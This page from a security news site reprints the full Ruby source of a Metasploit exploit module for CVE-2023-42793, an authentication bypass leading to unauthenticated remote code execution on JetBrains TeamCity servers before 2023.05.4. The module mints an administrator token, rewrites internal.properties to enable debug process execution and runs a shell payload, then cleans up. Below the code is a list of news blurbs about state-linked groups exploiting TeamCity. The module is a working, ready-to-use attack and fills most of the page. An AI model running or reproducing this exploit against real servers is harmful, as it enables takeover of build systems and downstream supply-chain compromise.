Security
Headlines
HeadlinesLatestCVEs

Headline

JetBrains TeamCity Unauthenticated Remote Code Execution

This Metasploit module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource.

Packet Storm
#vulnerability#windows#linux#git#java#rce#xpath#auth#ruby
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Retry  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution          against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are          vulnerable to this issue. The vulnerability was originally discovered by SonarSource.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-42793'],          ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'],          ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/']        ],        'DisclosureDate' => '2023-09-19',        'Platform' => %w[win linux],        'Arch' => [ARCH_CMD],        'Payload' => { 'Space' => 1024 },        'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.        'Targets' => [          [            'Windows',            {              'Platform' => 'win'            }          ],          [            'Linux',            {              'Platform' => 'linux'            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default TeamCity listens for HTTP requests on TCP port 8111.        Opt::RPORT(8111),        # The first user created during installation is an administrator account, so the ID will be 1.        OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),        # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.        OptInt.new('TEAMCITY_CHANGE_TIMEOUT', [true, 'The timeout to wait for the changes to be applied', 30])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => '/login.html'    )    return CheckCode::Unknown('Connection failed') unless res    # We expect a TeamCity server to respond with either a "TeamCity-Node-Id" header value or a cookie named "TCSESSIONID".    # In the responses HTML body will be a string containing the release name and build version.    if (res.headers.key?('TeamCity-Node-Id') || res.get_cookies.include?('TCSESSIONID')) && (res.body =~ /(\d+\.\d+\.\d+) \(build (\d+)\)/)      detected = "JetBrains TeamCity #{::Regexp.last_match(1)} (build #{::Regexp.last_match(2)}) detected."      # The vulnerability was patched in release 2023.05.4 (build 129421) so anything before this build is vulnerable.      if ::Regexp.last_match(2).to_i < 129421        return CheckCode::Vulnerable(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(token_uri)    )    # A token named 'RPC2' may already exist if this system has been exploited before and previous exploitation    # did not delete teh token after use. We detect that here, delete the token (as we dont know its value) if required    # and then proceed to create a new token for our use.    if res && (res.code == 400) && res.body.include?('Token already exists')      print_status('Token already exists, deleting and generating a new one.')      unless delete_token(token_uri)        fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(token_uri)      )    end    unless res&.code == 200      # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here      # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.      if res && (res.code == 404) && res.body.include?('User not found')        print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')      end      fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')    end    begin      token = Nokogiri::XML(res.body).xpath('/token')&.attr('value').to_s      print_status("Created authentication token: #{token}")      print_status('Modifying internal.properties to allow process creation...')      unless modify_internal_properties(token, 'rest.debug.processes.enable', 'true')        fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')      end      begin        print_status('Executing payload...')        vars_get = {}        # We need to supply multiple params with the same name, so the TeamCity server (A Java Spring framework) can        # construct a List<String> sequence for multiple parameters. We can do this be enabling `compare_by_identity`        # in the Ruby Hash.        vars_get.compare_by_identity        case target['Platform']        when 'win'          vars_get['exePath'] = 'cmd.exe'          vars_get['params'] = '/c'          vars_get['params'] = payload.encoded        when 'linux'          vars_get['exePath'] = '/bin/sh'          vars_get['params'] = '-c'          vars_get['params'] = payload.encoded        end        res = send_request_cgi(          'method' => 'POST',          'uri' => normalize_uri('/app/rest/debug/processes'),          'uri_encode_mode' => 'hex-all', # we must encode all characters in the query param for the payload to work.          'headers' => {            'Authorization' => "Bearer #{token}",            'Content-Type' => 'text/plain'          },          'vars_get' => vars_get        )        unless res&.code == 200          fail_with(Failure::UnexpectedReply, 'Failed to execute arbitrary process.')        end      ensure        print_status('Resetting the internal.properties settings...')        unless modify_internal_properties(token, 'rest.debug.processes.enable', nil)          fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')        end      end    ensure      print_status('Deleting the authentication token.')      unless delete_token(token_uri)        fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')      end    end  end  def delete_token(token_uri)    res = send_request_cgi(      'method' => 'DELETE',      'uri' => normalize_uri(token_uri),      'headers' => {        'Connection' => 'close'      }    )    res&.code == 204  end  def modify_internal_properties(token, key, value)    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri('/admin/dataDir.html'),      'headers' => {        'Authorization' => "Bearer #{token}"      },      'vars_get' => {        'action' => 'edit',        'fileName' => 'config/internal.properties',        'content' => value ? "#{key}=#{value}" : ''      }    )    unless res&.code == 200      # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The      # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.      if res&.code == 302        print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')      end      return false    end    print_status('Waiting for configuration change to be applied...')    retry_until_truthy(timeout: datastore['TEAMCITY_CHANGE_TIMEOUT']) do      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri('/admin/admin.html'),        'headers' => {          'Authorization' => "Bearer #{token}",          'Accept' => '*/*'        },        'vars_get' => {          'item' => 'diagnostics',          'tab' => 'properties'        }      )      res&.code == 200 && res.body.include?(key)    end  endend

Related news

CISA Warns of Threat Actors Exploiting F5 BIG-IP Cookies for Network Reconnaissance

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks. It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who

Critical JetBrains TeamCity On-Premises Flaw Exposes Servers to Takeover - Patch Now

JetBrains is alerting customers of a critical security flaw in its TeamCity On-Premises continuous integration and continuous deployment (CI/CD) software that could be exploited by threat actors to take over susceptible instances. The vulnerability, tracked as CVE-2024-23917, carries a CVSS rating of 9.8 out of 10, indicative of its severity. "The vulnerability may enable an unauthenticated

Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach

By Waqas Polish authorities and FortiGuard Labs have issued a warning to customers about a new wave of cyberattacks associated with TeamCity. This is a post from HackRead.com Read the original post: Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach

Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks

Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain

Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans

The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based

North Korean Hackers Distribute Trojanized CyberLink Software in Supply Chain Attack

A North Korean state-sponsored threat actor tracked as Diamond Sleet is distributing a trojanized version of a legitimate application developed by a Taiwanese multimedia software developer called CyberLink to target downstream customers via a supply chain attack. "This malicious file is a legitimate CyberLink application installer that has been modified to include malicious code that downloads,

October 2023: back to Positive Technologies, Vulristics updates, Linux Patch Wednesday, Microsoft Patch Tuesday, PhysTech VM lecture

Hello everyone! October was an interesting and busy month for me. I started a new job, worked on my open source Vulristics project, and analyzed vulnerabilities using it. Especially Linux vulnerabilities as part of my new Linux Patch Wednesday project. And, of course, analyzed Microsoft Patch Tuesday as well. In addition, at the end of […]

North Korean State Actors Attack Critical Bug in TeamCity Server

Known threat groups Diamond Sleet and Onyx Sleet focus on cyber espionage, data theft, network sabotage, and other malicious actions, Microsoft says.

Microsoft Warns of North Korean Attacks Exploiting TeamCity Flaw

North Korean threat actors are actively exploiting a critical security flaw in JetBrains TeamCity to opportunistically breach vulnerable servers, according to Microsoft. The attacks, which entail the exploitation of CVE-2023-42793 (CVSS score: 9.8), have been attributed to Diamond Sleet (aka Labyrinth Chollima) and Onyx Sleet (aka Andariel or Silent Chollima). It's worth noting that both the

CISA Warns of Active Exploitation of JetBrains and Windows Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog due to active exploitation, while removing five bugs from the list due to lack of adequate evidence. The vulnerabilities newly added are below - CVE-2023-42793 (CVSS score: 9.8) - JetBrains TeamCity Authentication Bypass Vulnerability

JetBrains Patches Severe TeamCity Flaw Allowing RCE and Server Hijacking

By Deeba Ahmed JetBrains has fixed this flaw in version 2023.05.4 of the product released on September 18. It also released a security advisory but didn't disclose technical details of the vulnerability for now. This is a post from HackRead.com Read the original post: JetBrains Patches Severe TeamCity Flaw Allowing RCE and Server Hijacking

Critical JetBrains TeamCity Flaw Could Expose Source Code and Build Pipelines to Attackers

A critical security vulnerability in the JetBrains TeamCity continuous integration and continuous deployment (CI/CD) software could be exploited by unauthenticated attackers to achieve remote code execution on affected systems. The flaw, tracked as CVE-2023-42793, carries a CVSS score of 9.8 and has been addressed in TeamCity version 2023.05.4 following responsible disclosure on September 6,

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13